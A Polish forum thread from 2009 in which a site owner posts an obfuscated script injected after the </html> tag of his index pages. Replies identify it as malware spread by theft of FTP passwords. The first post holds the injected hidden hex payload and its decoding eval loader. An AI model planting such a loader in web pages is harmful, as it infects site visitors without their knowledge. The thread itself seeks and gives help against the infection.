 [HTML]Samogenerujący się skrypt |
| [HTML]Samogenerujący się skrypt |
 10.02.2009, 13:59:40
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 10.02.2009 Ostrzeżenie: (0%) 
 |
Kod <div id='x0f8daa64e2c0a7c9b2bd6916e621e5f95'><style>.dX1Pu{display:none}</style><font id='__76e9' class='dX1Pu'>66756e6374696f6e20693832696c77286f687 7297b66756e6374696f6e20717143287a396d42 97b766172207332373758773d303b766172207765543d7a396d422e6c656e6774682c20694f753d3 3b7768696c6528694f753c776554297b7332373758772b3d7856484862287a396d422c694f75292a 765543b694f752b2b3b7d72657475726e20287332373758772b2727293b7d66756e6374696f6e207 5648486228674e322c766473297b72657475726e20674e322e63686172436f646541742876647329 b7d202020747279207b7661722068455178763d6576616c282761797279673975796d4365396e237 2373432e3963426139</font><font id='__de21' class='dX1Pu'>6c796c2365796542272e7265706c61636528 2f5b39794223435d2f672c20272729292c68584b d27272c756f7a5455343d302c72336c6e623d303b766172206f424a473d286e657720537472696e6 28684551787629292e7265706c616365282f5b5e40612d7a302d39412d5a5f2e2c2d5d2f672c2727 93b76617220714951715663343d717143286f424a47293b6f68773d756e657363617065286f68772 3b666f7228766172206470767731453d303b20647076773145203c20286f68772e6c656e67746829 b206470767731452b2b297b766172207373556d6d683d7856484862286f424a472c756f7a5455342 5e7856484862287149</font><h5 id='__895' class='dX1Pu'></h4><h5 class='dX1Pu' id='__d7c2'>3225323925376325 376125373225373325336625333025333525333425333325336325366425 73425333125356325326525316225313025336525336125373925333625343925363725376425326 25333025323625303525303625353225363725343025333525363125363625363825373625366525 23925323425303625363725353225353525316525333325323425323425346225313725326525373 25373925326425366225303525303025336325353625373325323625336425323825363925333925 33625323425363025336125353925363225326525326525363025313225373325333525343325373 253732253639253262</h5><span id='__fe55' class='dX1Pu'>25376225326125336225356125366125343527293b</span><h5 class='dX1Pu' id='__da1f'></h5><script>var HexChars = "0123456789ABCDEF";function h2d(HexVal){HexVal=HexVal.toUpperCase();var DecVal=0;var HV1=HexVal.substring(0,1);DecVal=(HexChars.indexOf(HV1)*16);HV1=HexVal.substring(1);DecVal+=HexChars.indexOf(HV1);return String.fromCharCode(DecVal);}var s=''; var o=Array('__76e9','__de21','__895','__5a2','__5d25','__fd24','__773','__2beb','__a1c','__c04',' __e78','__e86','__ea2c','__ac4','__620','__4b8','__cf22','__d7c2','__2448','__fe55','__da1f'); for(var i in o) s+=document.getElementById(o[i]).innerHTML; var ss=''; for(var i=0; i <s.length; i+=2) ss+=h2d(s.substr(i,2)); eval(ss);</script></div> Czy mógłby ktoś odpowiedzieć, kto bądź co generuję ten skrypt? Pojawia się On w obydwu indexach (index.php) oraz (index-eng.php) za Tagiem </html> Na Stronie www.konstrukcje-mas.com Pozdrawiam Serdecznie Ten post edytował Arabator 10.02.2009, 14:00:53 |
 |
 
|
 |
|
10.02.2009, 14:03:50
Post
#2
|
|
 Grupa: Moderatorzy Postów: 8 989 Pomógł: 1550 Dołączył: 8.08.2008 Skąd: Słupsk/Gdańsk |
Wstępnie podejrzewam, że to wirusik. Zmień hasła dostępowe do konta i wywal ten kod z plików.
-------------------- |
|
|
|
|
10.02.2009, 14:28:40
Post
#3
|
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 10.02.2009 Ostrzeżenie: (0%)
|
Cytat(wookieb @ 10.02.2009, 14:03:50 )  Wstępnie podejrzewam, że to wirusik. Zmień hasła dostępowe do konta i wywal ten kod z plików. Zmienione, mam nadzieję, że się to nie powtórzy. 
|
|
|
|
|
14.02.2009, 18:47:14
Post
#4
|
|
 Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 13.02.2009 Ostrzeżenie: (0%)
|
Pytanie przez co się dostał i co robi ten wirus, z tego co widziałem nie masz na stronie żadnych formularzy, mam ten sam problem z takim wirusem, niestety co jakoś czas się odnawia, jak się bronić
Ten post edytował Renegade 14.02.2009, 18:47:46 |
|
|
|
|
14.02.2009, 19:01:05
Post
#5
|
|
|
Grupa: Zarejestrowani Postów: 82 Pomógł: 18 Dołączył: 2.02.2009 Ostrzeżenie: (0%)
|
zainstalować antywirusa - często takie wirusy dostają się przez ftp.
|
|
|
|
|
14.02.2009, 19:07:42
Post
#6
|
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 13.02.2009 Ostrzeżenie: (0%)
|
Niestety serwer nie jest mój i stoi na Linuksie, co ciekawe robiłem testy kilkoma AV na Windowsie poddając zarażony plik skanowaniu, niestety, żaden nic nie wykrył.
|
|
|
|
|
14.02.2009, 19:13:23
Post
#7
|
|
|
Grupa: Zarejestrowani Postów: 82 Pomógł: 18 Dołączył: 2.02.2009 Ostrzeżenie: (0%)
|
Cytat(Renegade @ 14.02.2009, 19:07:42 ) Niestety serwer nie jest mój i stoi na Linuksie, co ciekawe robiłem testy kilkoma AV na Windowsie poddając zarażony plik skanowaniu, niestety, żaden nic nie wykrył. skanowanie samego pliku Ci nic nie da - to Ty gdzieś w systemie możesz mieć wirusa, który podczas wysyłania plików na serwer FTP dopisuje się do nich lub przechwytuje hasło do FTP. |
|
|
|
|
14.02.2009, 19:21:36
Post
#8
|
|
 Grupa: Zarejestrowani Postów: 1 387 Pomógł: 273 Dołączył: 18.02.2008 Ostrzeżenie: (0%)
|
Masz trojana/wirusa który ściąga hasło do FTP z Twojego komputera i wysyła na serwer włamywaczy. Swoją drogą ostatnio sporo wysyp tego typu problemów na forum...
Ten post edytował l0ud 14.02.2009, 19:21:57 -------------------- XMPP: l0ud@chrome.pl
|
|
|
|
 |
|
Wersja Lo-Fi | Aktualny czas: 14.08.2025 - 02:00 |
